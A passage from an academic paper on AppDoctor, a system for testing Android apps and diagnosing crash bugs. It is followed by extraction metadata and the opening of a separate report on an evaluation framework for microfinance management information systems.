reflection to replace AsyncTask with its own to monitor all background tasks and wait for them to finish. 7.6 Input Generation Apps often require inputs to move from one activity to another. For instance, an app may ask for an email address or user name. AppDoctor has a component to generate proper inputs to improve coverage. It focuses on text boxes because they are the most common ways for apps to get texts from users. Android has a nice feature that simplifies AppDoctor’s input generation. Specifically, Android allows developers to specify the type of a text box (e.g., email addresses and integers), so that when a user starts typing, Android can display the keyboard customized for the type of text. Leveraging this feature, AppDoctor automatically fills many text boxes with texts from a database we pre-generated, which includes email addresses, numbers, etc. To further help developers test apps, AppDoctor allows developers to specify input generation rules in the form of “widget-name:pattern-of-text-to-fill.” In our experiments, the most common use of this mechanism is to specify login credentials. Other than text boxes, developers may also specify rules to generate inputs for other actions, including the value set by SetNumberPicker, the item selected by ListSelect and the position set by MoveSeekBar. By default, AppDoctor generates random inputs for these three actions. Note that AppDoctor can leverage symbolic execution [14, 22] to generate inputs that exercise tricky code paths within apps, which we intend to explore in future work. However, our current mechanisms suffice to detect many bugs because, based on our experience, apps treat many input texts as “black boxes,” and simply store and display the texts without actually using them in any fancy way. 7.7 Replay and Nondeterminism Recall that, at various stages, AppDoctor replays a trace to verify if the trace can reproduce the corresponding failure. This replay is subject to the nondeterminism in the target app and environment. A plethora of work has been done in deterministic record-replay [20, 27, 34, 43]. Although AppDoctor can readily leverage any of these techniques, we currently have not ported them to AppDoctor. For simplicity, we implemented a best-effort replay technique and replayed every trace 20 times. 7.8 Removing Redundant Reports One bug may manifest multiple times during exploration, causing many redundant bug reports. After collecting reports from all servers, AppDoctor filters redundant reports based mainly on the type of the failure and the stack trace and keeps five reports per bug. 7.9 Extracting App Information AppDoctor uses ApkTool [12] to unpack the target app for analysis. It processes AndroidManifest.xml to find necessary information, including target app’s identifier, startup activity, and library dependencies. It then uses this information to start the target app on configurations with the required libraries. AppDoctor analyzes resource files to get the symbolic names corresponding to each widget, enabling developers to refer to widgets by symbolic names in their testing scripts (§7.4) and input generation rules (§7.6). 8. Evaluation We evaluated AppDoctor on a total of 64 popular apps from Google Play, including 53 closed-source apps and 11 open-source ones, listed in §8.1. We selected the closed-source apps as follows. We started from the top 100 popular apps in Nov 2012, then excluded 31 games that use custom GUI widgets written from scratch which AppDoctor does not currently handle, 3 apps that require bank accounts or paid memberships, 2 libraries that do not run alone, 8 apps with miscellaneous dependencies such as requiring text message authentication, and 3 apps that do not work with the Android instrumentation framework. We selected 11 open-source apps also based on popularity. Their source code simplifies inspecting the cause of the bugs detected. We picked the most popular apps because they are well tested, presenting a solid benchmark suite of AppDoctor’s bug detection capability. We ran several quick checking sessions on these apps. Each session ran for roughly one day and had 165,000 executions, 2,500 per app. These executions were run on a cluster of 14 Intel Xeon servers. Each execution ran until 100 actions were reached or the app exited. Each session detected a slightly different set of bugs because checking executions used heuristics. Except §8.1 which reports cumulative bug results over all sessions, all other subsections report results from the latest session. The rest of this section focuses on four questions: §8.1: Can AppDoctor effectively detect bugs? §8.2: Can AppDoctor achieve reasonable coverage? §8.3: Can AppDoctor greatly speed up testing? §8.4: Can AppDoctor reduce diagnosis effort? 8.1 Bugs Detected AppDoctor found a total of 72 bugs in 64 apps. Of these bugs, 67 are new and the other 5 bugs were unknown to us but known to the developers. We have reported 9 new bugs in the open-source apps to the developers because these bugs are easier to diagnose with source code and the apps have public websites for reporting bugs. The developers have fixed 2 bugs and confirmed two more. Of the 5 bugs unknown to us but known to the developers, 4 were fixed in the latest version, and the other 1 was reported by users but without event traces to reproduce the bugs. Table 1 shows the bug count for each app we checked. We also show the number of users obtained from Google Play to show the popularity of the apps. The results show that AppDoctor can find bugs even in apps that have tens of millions of users and built by reputable companies such as Google and Facebook. AppDoctor even found two bugs in the Android framework that affect all apps. AppDoctor found no bugs in 24 apps: WordSearch, Flixster, Adobe Reader, BrightestFlaglight, Ebay, Skype, Pinterest, Spotify, Of Shopping List, Daily Money, Dropbox, Midomi, Groupon, Speedtest, ColorNote, Voxer, RedBox, Lookout, Facebook Messenger, Devuni Flaglight, Go SMS, Wikipedia, Ultimate StopWatch and Wells Fargo. We inspected all of the bugs found in the open-source apps to pinpoint their causes in the source code. Table 2 shows the details of these bugs. Most of the bugs are caused by accessing null references. The common reasons are that the developers forget to initialize references, access references that have been cleaned up, miss checks of null references, and fail to check certain assumptions about the environments. Most of these bugs can be triggered only under rare event sequences. We describe two interesting bugs. The first is Bug 11 in Table 2, a bug in the Android framework. AppDoctor was <table> <thead> <tr> <th>App</th> <th>Bugs</th> <th>Users (M)</th> <th>Open?</th> <th>Hints</th> </tr> </thead> <tbody> <tr> <td>Android</td> <td>2</td> <td>n/a</td> <td></td> <td></td> </tr> <tr> <td>Google Maps</td> <td>3</td> <td>500 ~ 1000</td> <td></td> <td></td> </tr> <tr> <td>Facebook</td> <td>2</td> <td>500 ~ 1000</td> <td>L, D</td> <td></td> </tr> <tr> <td>Pandora</td> <td>1</td> <td>100 ~ 500</td> <td>L</td> <td></td> </tr> <tr> <td>Twitter</td> <td>1</td> <td>100 ~ 500</td> <td>L</td> <td></td> </tr> <tr> <td>Google Translate</td> <td>3</td> <td>100 ~ 500</td> <td>L</td> <td></td> </tr> <tr> <td>Shazam</td> <td>3</td> <td>100 ~ 500</td> <td>L</td> <td></td> </tr> <tr> <td>Sgiggle</td> <td>2</td> <td>100 ~ 500</td> <td>L</td> <td></td> </tr> <tr> <td>Advanced Task Killer</td> <td>1</td> <td>50 ~ 100</td> <td>L</td> <td></td> </tr> <tr> <td>Barcode Scanner</td> <td>1</td> <td>50 ~ 100</td> <td>L</td> <td></td> </tr> <tr> <td>Zedge</td> <td>1</td> <td>50 ~ 100</td> <td>L</td> <td></td> </tr> <tr> <td>Amazon Kindle</td> <td>1</td> <td>50 ~ 100</td> <td>L</td> <td></td> </tr> <tr> <td>Yahoo Mail</td> <td>3</td> <td>50 ~ 100</td> <td>L</td> <td></td> </tr> <tr> <td>TuneIn Player</td> <td>1</td> <td>50 ~ 100</td> <td>L</td> <td></td> </tr> <tr> <td>Walk Band</td> <td>2</td> <td>50 ~ 100</td> <td>D</td> <td></td> </tr> <tr> <td>PhotoGrid</td> <td>1</td> <td>50 ~ 100</td> <td>D</td> <td></td> </tr> <tr> <td>Kik Messenger</td> <td>3</td> <td>50 ~ 100</td> <td>L</td> <td></td> </tr> <tr> <td>Logo Quiz</td> <td>2</td> <td>10 ~ 50</td> <td>D</td> <td></td> </tr> <tr> <td>Zynga Words</td> <td>2</td> <td>10 ~ 50</td> <td>D</td> <td></td> </tr> <tr> <td>Amazon</td> <td>2</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>Mobile Bible</td> <td>3</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>MyCalendar</td> <td>1</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>Dictionary</td> <td>1</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>GasBuddy</td> <td>1</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>ooVoo</td> <td>1</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>iHeartRadio</td> <td>1</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>IMDB Mobile</td> <td>1</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>ESPN Sports</td> <td>2</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>Craigslist</td> <td>2</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>TextGram</td> <td>1</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>Google MyTracks</td> <td>2</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>Terminal Emulator</td> <td>1</td> <td>10 ~ 50</td> <td>L</td> <td></td> </tr> <tr> <td>Fandango</td> <td>2</td> <td>10 ~ 50</td> <td>L, D</td> <td></td> </tr> <tr> <td>DoubleDown</td> <td>1</td> <td>5 ~ 10</td> <td>L</td> <td></td> </tr> <tr> <td>Of FileManager</td> <td>2</td> <td>5 ~ 10</td> <td>L</td> <td>Yes</td> </tr> <tr> <td>MP3 Ringtone Maker</td> <td>2</td> <td>1 ~ 5</td> <td>L</td> <td></td> </tr> <tr> <td>BlackFriday</td> <td>6</td> <td>1 ~ 5</td> <td>L</td> <td></td> </tr> <tr> <td>ACV Comic Viewer</td> <td>2</td> <td>1 ~ 5</td> <td>L</td> <td>Yes</td> </tr> <tr> <td>OpenSudoku</td> <td>1</td> <td>1 ~ 5</td> <td>L</td> <td></td> </tr> <tr> <td>Of Notepad</td> <td>1</td> <td>0.1 ~ 0.5</td> <td>Yes</td> <td></td> </tr> <tr> <td>Of Safe</td> <td>1</td> <td>0.1 ~ 0.5</td> <td>Yes</td> <td></td> </tr> </tbody> </table> Table 1: Each app’s bug count. First row lists the bugs AppDoctor found in the Android framework, which affect almost all apps. Number of users is in millions. The “Open?” column indicates whether the app is open source. “Hints” lists additional information we added: “L” for login credentials (§7.6) and “D” for delays (§7.7). <table> <thead> <tr> <th>App</th> <th>Bug Description</th> <th>Status</th> </tr> </thead> <tbody> <tr> <td>1 Google MyTracks</td> <td>Pressing ‘Search’ button bypassed License dialog and environment check, causing a</td> <td>Fixed</td> </tr> <tr> <td></td> <td>crash</td> <td></td> </tr> <tr> <td>2 OI File Manager</td> <td>Checked for NullPointerException in doInBackground() but missed in onPostExecute()</td> <td>Fixed</td> </tr> <tr> <td>3 Terminal Emulator</td> <td>Rare event sequence led to access of discarded variable</td> <td>Confirmed</td> </tr> <tr> <td>4 OI File Manager</td> <td>Rare event order led to use of uninitialized variable</td> <td>Confirmed</td> </tr> <tr> <td>5 ACV Comic Viewer</td> <td>Incorrect assumption of the presence of Google Services caused a crash</td> <td>Reported</td> </tr> <tr> <td>6 ACV Comic Viewer</td> <td>Failed to check for the failure of opening a file due to lack of permission, causing a</td> <td>Reported</td> </tr> <tr> <td>7 OI Notepad</td> <td>Failed to check for the availability of another software after rotation, while checked before rotation</td> <td>Reported</td> </tr> <tr> <td>8 OpenSudoku</td> <td>Failed to check for the failure of loading a game, which was caused by the deletion of the game</td> <td>Reported</td> </tr> <tr> <td>9 OI Safe</td> <td>Rare event sequence led to access of discarded variable</td> <td>Reported</td> </tr> <tr> <td>10 Google MyTracks</td> <td>Dismissing a dialog which had been removed from the screen due to lifecycle events</td> <td>Known</td> </tr> <tr> <td>11 Android</td> <td>Rare event order led to a failed check in Android code</td> <td>Known</td> </tr> </tbody> </table> Table 2: All bugs found in open-source app. We list one Android framework bug (Bug 11) because AppDoctor found this bug when testing OpenSudoku and Wikipedia. The bug was reported by others, but the report contained no event traces causing the bug. Figure 9: Activity coverage on apps. Each bar represents an app. - OpenSudoku, Wikipedia, Yahoo Mail, Shazam, Facebook, and Pinterest. We counted this bug as one bug to avoid inflating our bug count. To trigger this bug in OpenSudoku, a user selects a difficulty level of the game, and presses the Back key of the phone quickly, which sometimes crashes the app. The cause is that when an app switches from one activity to another, many event handlers are called. In the common case, these event handlers are called one by one in order, which tends to be what developers test. However, in rare cases, another event handler, such as the handler of the Back key in OpenSudoku, may jump into the middle of this sequence while the app is in an intermediate state. If this handler refers to some part of the app state, the state may be inconsistent or already destroyed, causing a crash. This bug was reported to the Android bug site, but no event sequences were provided on how the bug might be triggered, and the bug is still open. We recently reported the event sequence to trigger this bug, and are waiting for developers to reply. The second is a bug in Google Translate, the most popular language translation app in Android, closed source, and built by Google. This bug causes Google Translate to crash after a user presses the Search key on the phone at the wrong moment. When a user first installs and runs Google Translate, it pops up a license agreement dialog with an Accept and a Decline button. If she presses the Accept button, she enters the main screen of Google Translate. If she presses the Decline button, Google Translate exits and she cannot use the app. However, on Android 2.3, if the user presses the Search button, the dialog is dismissed, but Google Translate is left in a corrupted state, and almost always crashes after a few events regardless of what the user does. We inspected the crash logs and found that the crashes were caused by accessing uninitialized references, indicating a logic bug inside Google Translate. This bug is specific to Android 2.3, and does not occur in Android 4.0 and 4.2. AppDoctor found a similar bug in Google MyTracks (Bug 1 in Table 2). Unlike the bug in Google Translate, this bug can be triggered in Android 2.3, 4.0, and 4.2. We reported it and, based on our report, developers have fixed it and released a new version of the app. 8.2 Coverage We measured AppDoctor’s coverage from the latest 1-day checking session. We used two metrics. First, we measured AppDoctor’s coverage of activities by recording the activities AppDoctor visited, and comparing them with all the activities in the apps. We chose this metric because once AppDoctor reaches an activity, it can explore most actions of the activity. Figure 9 shows the results. With only 2,500 executions per app, AppDoctor covered 66% of the activities averaged over all apps tested, and 100% for four apps. To understand what caused AppDoctor to miss the other activities, we randomly sampled 12 apps and inspected their disassembled code. The four main reasons are: (1) dead code (Lookout, Facebook, Flixster, OI Shopping List); (2) hardware requirement (e.g., PandoraLink for linking mobile devices with cars) not present (Sgiggle, Pandora, Brightest Flashlight); (3) activities available only to developers or pre- mium accounts (Looksout, Groupon, Flixster, Facebook Messenger, Photogrid, Fandango), and (4) activities available after a nondeterministic delay (Groupon, Midomi, Pandora). Second, we also evaluated AppDoctor’s false negatives by running it on 6 bugs in five open-source apps, including two bugs in KeePassDroid (a password management app) and one bug each in OI Shopping List, OI Notepad, OI Safe (another password management app), and OI File Manager. We picked these bugs because they are event-triggered bugs, which AppDoctor is designed to catch. AppDoctor found 5 out of the 6 bugs. It missed one bug in KeePassDroid because it treated 2 different states as the same and pruned the executions that trigger the bug. 8.3 Speedup AppDoctor’s speedup comes from (1) actions run faster in approximate mode and (2) it performs the next action as soon as the previous one finishes. Figure 10 shows the speedup caused by the two factors. For each of the 165,000 executions from the latest AppDoctor checking session, we measured the time it took to complete this execution in (a) approximate mode, (a) faithful mode, and (c) MonkeyRunner. The difference between (a) and (b) demonstrates the speedup from approximate execution. The difference between (a) and (c) demonstrates the speedup from both approximate execution and AppDoctor’s more efficient wait method. As shown in Figure 10, approximate execution yields $6.0 \times$ speedup, and the efficient wait brings the speedup to $13.3 \times$. Since most executions do not trigger bugs, AppDoctor spends majority of time in approximate mode, so this result translates at least $13.3 \times$ speedup over MonkeyRunner, “at least” because MonkeyRunner blindly injects events whereas AppDoctor does so systematically. 8.4 Automatic Diagnosis We evaluated how AppDoctor helps diagnosis using the reports from the last checking session. We focus on: (1) how many reports AppDoctor can automatically verify; (2) for the reports AppDoctor cannot verify, whether they are FPs or bugs; (3) what causes FPs; and (4) how effective action slicing is at pruning irrelevant events. Figure 11 shows AppDoctor’s automatic diagnosis results based on the latest checking session, which reduced the number of bug reports to inspect from 64 to only 5, $12.8 \times$ reduction. AppDoctor initially emitted 64 bug reports on all 64 apps in the latest session. Of these reports, it could replay 61 in approximate mode, and discarded the other 3 reports as false positives. It then simplified the 61 reports and managed to replay 47 in faithful mode. Based on the 47 faithfully replayed reports, it generated MonkeyRunner testcases and automatically reproduced 43 bugs on clean devices, verifying that these 43 reports are real bugs. 4 MonkeyRunner testcases did not reproduce the bugs, so AppDoctor flagged them as needing manual inspection. Out of the 14 reports that could be replayed in approximate mode but not in faithful mode, AppDoctor automatically pruned 13 false positives. The remaining one it could not prune was due to a limitation in our current implementation of the faithful mode of ListSelect (§5.1). Selecting an item by injecting low-level events involves two steps: scrolling the list to make the item show up, and moving the focus to the selected item. We implemented the first step by injecting mouse events to scroll the list, but not the second step because it requires external keyboard or trackball support, which we have not added. AppDoctor flagged this report as needing manual inspection. Thus, out of 64 reports, AppDoctor automatically classified 59, leaving only 5 for manual inspection. The 5 reports that need manual inspection contain 4 MonkeyRunner testcases and 1 report caused by ListSelect. We manually inspected the MonkeyRunner testcases and modified one line each to change the timing of an event. The modified testcases verified the bugs on real phones. For the one report caused by ListSelect, we manually reproduced it on real phones. Thus, all of these 5 reports are real bugs. The total number of bugs AppDoctor found in this session is $(43 + 5) = 48$, lower than 72, the total number of bugs over all sessions, because each session may find slightly different set of bugs due to our search heuristics. AppDoctor automatically pruned 13 FPs in this session, demonstrating the benefit of faithful replay. 6 are caused by approximate long click, 5 approximate configuration change, and 2 approximate text input. 9. Limitations Currently, AppDoctor supports system actions such as Stop, Start and Relaunch, and common GUI actions such as Click and LongClick. Adding new standard actions is easy. AppDoctor does not support custom widgets developed from scratch because these widgets receive generic events such as Click at \((x, y)\) and then use complex internal logic to determine the corresponding action. AppDoctor also does not support custom action handlers on custom widgets created from standard widgets. Its input generation is incomplete. Symbolic execution [29] will help solve this problem. If an app talks to a remote server, AppDoctor does not control the server. AppDoctor’s replay is not fully deterministic, which may cause AppDoctor to consider a real bug as a false positive and prune it out, but this problem can be solved by previous work [20, 23, 49]. AppDoctor leverages Android instrumentation which instruments only Java-like bytecode, so AppDoctor has no control over the native part of the apps. These limitations may cause AppDoctor to miss bugs. 10. Related Work To our knowledge, no prior systems combined approximate and faithful executions, systematically tested against lifecycle events, identified the problem of FPs caused by approximate executions, generated event testcases, or provided solutions to automatically classify most reports into bugs and FPs and to slice unnecessary actions from bug traces. Unlike static tools, AppDoctor executes the app code and generates inputs. As a result, AppDoctor can provide an automated script to reproduce the bug on real devices, which static tools cannot do. Moreover, AppDoctor automatically verifies the bugs it finds, so all the verified bugs are not false positives and do not need manual inspection, unlike reports from static tools. Android apps are event-driven, and their control flow is hidden behind complex callbacks and inter process calls. Static tools often have a hard time analyzing event-driven programs, generate exceedingly many FPs that bury real bugs. Fuzz testing [28, 47] feeds random inputs to programs. Without knowledge of the programs, this approach has difficulties getting deep into the program logic. Model-based testing has been applied to mobile systems [9, 35, 37, 45]. They automatically inject GUI actions based on a model of the GUI. To extract this model, various techniques are used. Robotium [6] uses reflection to collect widgets on the GUI. Dynamic crawlers [9, 35, 37] collects available events from GUI widgets, an approach AppDoctor also takes. Some use static analysis to infer possible user actions for each widget [53]. Regardless of how they compute models, they do actions either in faithful mode (i.e., inject low-level events) or in approximate mode (i.e., directly calling handlers), but not both. As illustrated in §3, they suffer from either low speed or high manual inspection effort. Moreover, none of them systematically tests for lifecycle events. Interestingly, despite the significant FP rate (25% in our experiments), no prior systems that inject actions in approximate mode noted this problem, likely due to poor checking coverage. For example, DynoDroid [37] caught only 15 bugs in 1050 apps. Several systems [10, 19, 38] leverage symbolic execution to check apps or GUI event handlers. The common approach is to mark the input to event handlers as symbolic, and explore possible paths within the handlers. These systems tend to be heavyweight and are subject to the undecidable problem of constraint solving. The event-driven nature of apps also raises challenges for these systems, as tracing the control flow through many event handlers may require analyzing complex logic in both the GUI framework and the apps. Thus, these systems often use approximate methods to generate event sequences, which may not be feasible, causing FPs. Authors of a workshop paper [39] describe test drivers that call event handlers, including lifecycle event handlers, to drive symbolic execution. However, they call lifecycle event handlers only to set up an app to receive user actions. They do not systematically test how the app reacts to these events. Nor did they present an implemented system. Symbolic execution is orthogonal to AppDoctor: it can help AppDoctor handle custom widgets and actions (§9), and AppDoctor can help it avoid FPs by generating only feasible event sequences. Mobile devices are prone to security and privacy issues. TaintDroid [18], PiOS [17] and CleanOS [46] leverage taint tracking to detect privacy leakages. Malware detectors, RiskRanker [25] and Crowdroid [13], use both static and dynamic analysis to identify malicious code. Mobile devices are prone to abnormal battery drain caused by apps or configurations. Prior work [36, 42] detects or diagnoses abnormal battery problems. Action slicing shares the high-level concept with program slicing [8, 30, 33, 48], which removes unnecessary instructions from programs, paths, or traces. Different from program slicing, action slicing prunes actions, rather than instructions. It embraces approximation to aggressively slice out actions and replay to validate the slicing results. 11. Conclusion We presented AppDoctor, a system for efficiently and effectively testing Android apps and helping developers diagnose bug reports. AppDoctor uses approximate execution to speed up testing and automatically classify most reports into bugs or false positives. It uses action slicing to remove unnecessary actions from bug traces, further reducing diagnosis effort. AppDoctor works on Android, and operates as a device or emulator cloud. Results show that AppDoctor effectively detects 72 bugs in 64 of the most popular apps, speeds up testing by 13.3 times, and vastly reduces diagnosis effort. Acknowledgments We thank Charlie Hu (our shepherd), Xu Zhao, and the anonymous reviewers for their many helpful comments. This work was supported in part by AFRL FA8650-11-C-7190, FA8650-10-C-7024, and FA8750-10-2-0253; ONR N00014-12-1-0166; NSF CCF-1162021, CNS-1117805, CNS-1054906, and CNS-0905246; NSF CAREER; AFOSR YIP; Sloan Research Fellowship; and Google. References
{"Source-Url": "http://www.dtic.mil/dtic/tr/fulltext/u2/a617205.pdf", "len_cl100k_base": 15440, "olmocr-version": "0.1.53", "pdf-total-pages": 16, "total-fallback-pages": 0, "total-input-tokens": 56783, "total-output-tokens": 18996, "length": "2e13", "weborganizer": {"__label__adult": 0.0003142356872558594, "__label__art_design": 0.00032138824462890625, "__label__crime_law": 0.0002340078353881836, "__label__education_jobs": 0.0004887580871582031, "__label__entertainment": 7.575750350952148e-05, "__label__fashion_beauty": 0.0001468658447265625, "__label__finance_business": 0.00015783309936523438, "__label__food_dining": 0.0002008676528930664, "__label__games": 0.0009160041809082032, "__label__hardware": 0.0013895034790039062, "__label__health": 0.00021564960479736328, "__label__history": 0.0002009868621826172, "__label__home_hobbies": 6.014108657836914e-05, "__label__industrial": 0.00019359588623046875, "__label__literature": 0.0002219676971435547, "__label__politics": 0.00016701221466064453, "__label__religion": 0.00029206275939941406, "__label__science_tech": 0.0142974853515625, "__label__social_life": 5.9545040130615234e-05, "__label__software": 0.01155853271484375, "__label__software_dev": 0.9677734375, "__label__sports_fitness": 0.00018215179443359375, "__label__transportation": 0.0003001689910888672, "__label__travel": 0.00013720989227294922}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 79002, 0.03812]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 79002, 0.25398]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 79002, 0.89096]], "google_gemma-3-12b-it_contains_pii": [[0, 4206, false], [4206, 5532, null], [5532, 11511, null], [11511, 16774, null], [16774, 21933, null], [21933, 27458, null], [27458, 31184, null], [31184, 35963, null], [35963, 41022, null], [41022, 46643, null], [46643, 52760, null], [52760, 58041, null], [58041, 62445, null], [62445, 68335, null], [68335, 73412, null], [73412, 79002, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4206, true], [4206, 5532, null], [5532, 11511, null], [11511, 16774, null], [16774, 21933, null], [21933, 27458, null], [27458, 31184, null], [31184, 35963, null], [35963, 41022, null], [41022, 46643, null], [46643, 52760, null], [52760, 58041, null], [58041, 62445, null], [62445, 68335, null], [68335, 73412, null], [73412, 79002, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 79002, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 79002, null]], "pdf_page_numbers": [[0, 4206, 1], [4206, 5532, 2], [5532, 11511, 3], [11511, 16774, 4], [16774, 21933, 5], [21933, 27458, 6], [27458, 31184, 7], [31184, 35963, 8], [35963, 41022, 9], [41022, 46643, 10], [46643, 52760, 11], [52760, 58041, 12], [58041, 62445, 13], [62445, 68335, 14], [68335, 73412, 15], [73412, 79002, 16]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 79002, 0.18812]]}
olmocr_science_pdfs
2024-12-10
2024-12-10
7588fec47472761c4c4682d1b68ec081bf21dd63
Management Information Systems for Microfinance An Evaluation Framework Management Information Systems for Microfinance: An Evaluation Framework by Andrew Mainhart Development Alternatives, Inc. November 1999 This work was supported by the U.S. Agency for International Development, Bureau for Global Programs, Center for Economic Growth and Agricultural Development, Office of Microenterprise Development, through funding to the Microenterprise Best Practices (MBP) Project, contract number PCE-C-00-96-90004-00. Andrew Mainhart, a Senior Development Specialist, has worked at Development Alternatives, Inc. (DAI) since 1998. He has provided technical advisory support to the CARD Bank in the Philippines, the Bank for Agriculture & Agricultural Cooperatives in Thailand, and ACLEDA in Cambodia. Mr. Mainhart has supported several USAID projects around the world including the Program for the Recovery of the Economy in Transition in Haiti, the Newbiznet project in the Ukraine, and the TFED project in Tanzania. In addition, he has spent time in Indonesia working with the information technology team at the Bank Rakyat Indonesia studying the bank’s information systems. Mr. Mainhart holds a B.S. degree in industrial management from Carnegie Mellon University. Before entering the microfinance field, he worked as a consultant with Andersen Consulting, implementing large-scale software projects for Fortune 500 companies and as a manager in the Information Technology Division of Bell Atlantic, a large U.S.-based telecommunications company. ACKNOWLEDGMENTS The author has benefited greatly from the comments of Robin Young, Matthew Buzby, Nhu-An Tran, John Magill, and Zan Northrip of Development Alternatives, Inc.; Anicca Jansen of the USAID Microenterprise Development Office; David Ferrand of the Department for International Development; Xavier Reille of Catholic Relief Services; Brigit Helms of CGAP; and Tony Sheldon, Todd Girvin, Nick Ramsing, and Ruth Goodwin. The author would also like to acknowledge the assistance of all those who participated in the MBP Information Systems in Microfinance seminar held in Washington, D.C., on March 8, 1999. To all those who provided comments, guidance, and other assistance, the author expresses profound thanks and gratitude. Of course, all views, omissions, and errors are attributable solely to the author. # TABLE OF CONTENTS ## CHAPTER ONE **INTRODUCTION** 1 - BACKGROUND ..................................................................................................................1 - PURPOSE ........................................................................................................................1 - METHODOLOGY ...............................................................................................................2 - USAGE .............................................................................................................................2 - DOCUMENT STRUCTURE ..............................................................................................4 ## CHAPTER TWO **THE FRAMEWORK** 5 - CATEGORY HIERARCHY ....................................................................................................5 - RESEARCH MATRIX .......................................................................................................6 - RATING METHOD ..........................................................................................................6 ## CHAPTER THREE **CATEGORY 1: FUNCTIONALITY AND EXPANDABILITY** 9 ## CHAPTER FOUR **CATEGORY 2: USABILITY** 19 ## CHAPTER FIVE **CATEGORY 3: REPORTING** 23 ## CHAPTER SIX **CATEGORY 4: STANDARDS AND COMPLIANCE** 27 ## CHAPTER SEVEN **CATEGORY 5: ADMINISTRATION AND SUPPORT** 31 ## CHAPTER EIGHT **CATEGORY 6: TECHNICAL SPECIFICATIONS AND CORRECTNESS** 37 BACKGROUND Over the past 5 to 10 years, microfinance institutions (MFIs) have been paying increasing attention to information systems, particularly management information systems (MIS). As both practitioners and donors have become aware of the great need for formal and informal financial institutions to manage large amounts of data, the drive to improve the manipulation and understanding of these data has grown. Information lies at the very heart of microfinance. Whether by hand or by computer, microfinance institutions maintain large amounts of critical business data, from basic client information to detailed analyses of portfolio statistics. These data must be stored, manipulated, and, most important, presented coherently to system users so that they can make sound management decisions. A good information system should do just that: It should act as a conduit through which raw data becomes useful and useable information. A good information system is a necessary tool for managing an institution successfully. This assertion, however, begs two questions: What is a good information system? And how does one determine whether a system is good? The easy answer to both questions is any system that meets an organization’s needs cost-effectively and allows the organization to grow without creating problems or inefficiencies is a good system. Obviously, this simple answer is not terribly helpful. For this reason, the need for an evaluation framework has become imperative, especially considering the microfinance field’s relative lack of knowledge about information systems and software development. PURPOSE The primary purpose of this paper is to present a mechanism for analyzing information systems, both those bought off-the-shelf and those developed internally. This MIS Evaluation Framework offers the industry a tool to determine the quality of an information system. The framework is very flexible and can be used by MFIs, donors, and other external stakeholders, as well as systems developers, to address different objectives: - MFIs can use it to evaluate off-the-shelf systems in their search for an appropriate solution. - MFIs can use it to appraise the quality of their existing system (off-the-shelf or internally developed) to help identify improvements. External entities can use it to evaluate off-the-shelf or internally developed systems either to assist an MFI, identify alternatives, or as part of an institutional appraisal. Software developers and information system planners can use it to build better systems. A certain level of generality was used in constructing the framework to meet the needs of a diverse audience. Consequently, factors specific to the organization or vendor in question (for example, stage of development, growth prospects, and number and complexity of products) should be added on a case-by-case basis. Because the framework is a tool, the evaluator needs to understand the situation and apply the framework in the most logical and effective way. **METHODOLOGY** Drawing from computer industry standards, such as DataPro, GartnerGroup, and Patricia Seybold Group, as well as the experience of software professionals, this paper outlines and defines a set of categories that can and should be used to evaluate any information system used in microfinance. To ensure this framework incorporates issues specific to microfinance—particularly the variety of microfinance institutional models, products, and services—the author consulted the Consultative Group to Assist the Poorest (CGAP) *Handbook for Management Information Systems for Microfinance Institutions* and spoke with numerous microfinance professionals. **USAGE** Any organization that decides to use this framework to perform a systems appraisal needs to be aware of several important factors: **Team membership.** The appraisal team should consist of at least two people. The size of the team will depend on the depth of the review and the experience and skills of the team members. The following factors should be considered when formulating such a team: # **Information technology expertise.** The framework is written in an attempt to simplify the often-complicated world of computer systems; however, as with any technical field, background knowledge of the subject matter is a necessity for the reviewer. At least one member of the appraisal team should have knowledge of computers and software, especially software development and support. A sound understanding of the standard software development process (such as the one outlined in the CGAP *Handbook for Management Information Systems for Microfinance Institutions*) and information architectures is crucial to the performance of this type of review. --- 1 These organizations publish detailed reports on various kinds of computer software, from operating systems to database management systems to banking software. Information technology specialists typically refer to these sources when selecting appropriate software for a given technical and/or functional environment. Generally, their reports offer in-depth, qualitative and quantitative analyses across a broad range of industry requirements and specifications. # Functional expertise. Since these reviews will be conducted on microfinance institutions, at least one member of the appraisal team should have expertise in microfinance. In addition, a general knowledge of both accounting and financial principles is a minimal requirement for performing any appraisal of a financial system. # Institutional expertise. When reviewing systems for use in a specific institution, there should be internal representation on the team. This team member would know the MFI’s operations intimately and could replace the team member providing functional expertise. If the 